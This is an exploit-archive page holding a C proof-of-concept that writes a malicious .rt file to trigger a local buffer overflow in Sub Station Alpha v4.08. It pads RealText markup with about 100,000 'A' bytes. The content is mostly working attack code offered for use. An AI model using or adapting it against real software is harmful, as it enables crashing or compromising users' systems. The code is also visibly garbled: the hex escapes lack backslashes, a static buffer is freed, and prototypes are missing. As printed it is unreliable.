[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Sub Station Alpha v4.08 .rt file Local Buffer Overflow PoC
# Published : 2010-01-15
# Author : fl0 fl0w
# Previous Title : OtsTurntables Free v1.00.047 SEH Overwrite POC
# Next Title : Multiple Media Player HTTP DataHandler Overflow (Itunes, Quicktime, etc) 


/*Sub Station Alpha v4.08 .rt file local buffer overflow poc
     by fl0 fl0w*/
#include <string.h>
#include <stdio.h>

#define FIL3 "testfile.rt"
   char header[]=
   {
             "x3Cx77x69x6Ex64x6Fx77x20x68x65x69x67x68x74x3Dx22x32x35x30x22x20x77x69x64x74x68x3Dx22x33x30"
             "x30x22x20x64x75x72x61x74x69x6Fx6Ex3Dx22x31x35x22x20x62x67x63x6Fx6Cx6Fx72x3Dx22x79x65x6Cx6C"
             "x6Fx77x22x3Ex0Dx0Ax4Dx61x72x79x20x68x61x64x20x61x20x6Cx69x74x74x6Cx65x20x6Cx61x6Dx62x2Cx0D"
             "x0Ax3Cx62x72x2Fx3Ex3Cx74x69x6Dx65x20x62x65x67x69x6Ex3Dx22"     //header 109 bytes
   };        
   char tail[]=
   {   
            //junk
            "x22x2Fx3Ex0Dx0Ax3Cx62x72x2Fx3Ex3Cx74x69x6Dx65x20x62x65x67x69x6Ex3Dx22x36x22x2Fx3Ex6Cx69x74"
            "x74x6Cx65x20x6Cx61x6Dx62x2Cx0Dx0Ax3Cx62x72x2Fx3Ex3Cx74x69x6Dx65x20x62x65x67x69x6Ex3Dx22x39"
            "x22x2Fx3Ex4Dx61x72x79x20x68x61x64x20x61x20x6Cx69x74x74x6Cx65x20x6Cx61x6Dx62x0Dx0Ax3Cx62x72"
            "x2Fx3Ex3Cx74x69x6Dx65x20x62x65x67x69x6Ex3Dx22x31x32x22x2Fx3Ex77x68x6Fx73x65x20x66x6Cx65x65"
            "x63x65x20x77x61x73x20x77x68x69x74x65x20x61x73x20x73x6Ex6Fx77x2Ex0Dx0Ax3Cx2Fx77x69x6Ex64x6F"
            "x77x3Ex0Dx0A"    //tail 154 bytes
   };      
   char banner[]=
   {
            "***********************************************************n"
            "Sub Station Alpha v4.08 .rt file local buffer overflow poc*n"
            "     by fl0 fl0w                                          *n"
            "***********************************************************n"
   };      
/*--------prototypes------*/  
   int cpy(char*,char*,int);
   int cpystr(char*,int,int,int);
   void print(char*);
   unsigned int getFsize(FILE*,char*);
/*-----extern var--------*/
   char b[1000000];  
   char *size;  
   char junk[1000000];
/*--------main---------------*/
    int main()
    {   
        printf("%s",banner);
        print("Starting sploit");
        memset(junk,0x41,99999);
         buildf(FIL3);
          print("File done!");
          getchar();
          return 0;
    }             
  int buildf(char* fname)
  {
      FILE* fp=fopen(fname,"wb");
        
      if(fp==NULL)
      {
         print("File writing error"); 
         exit(0);
      }   
      fprintf(fp,"%s%s%s",header,junk,tail);
      printf("[!]File is %d bytes",getFsize(fp,FIL3));
      fclose(fp);
      free(b);
              
      return 0;  
  }   
   unsigned int getFsize(FILE* g,char* gname)
   {
            unsigned int s;
            
             g=fopen(gname,"rb");
              
             if(g==NULL)
             {
             print("File error at reading");
             exit(0);
             }            
             fseek(g,0,SEEK_END);
             s=ftell(g);
             
            return s;
   }   
   int cpy(char* source,char* dest,int offset)
   {
     int len;
     len=strlen(source);
     memcpy(dest+offset,source,len+1);
     
     return len;
   } 
   int cpystr(char* dest,int str,int len,int offset)
  {
      memset(dest+offset,str,len+1);
      return len; 
  }     
   void print(char* msg)
   {
     printf("n[*]%sn",msg);
   }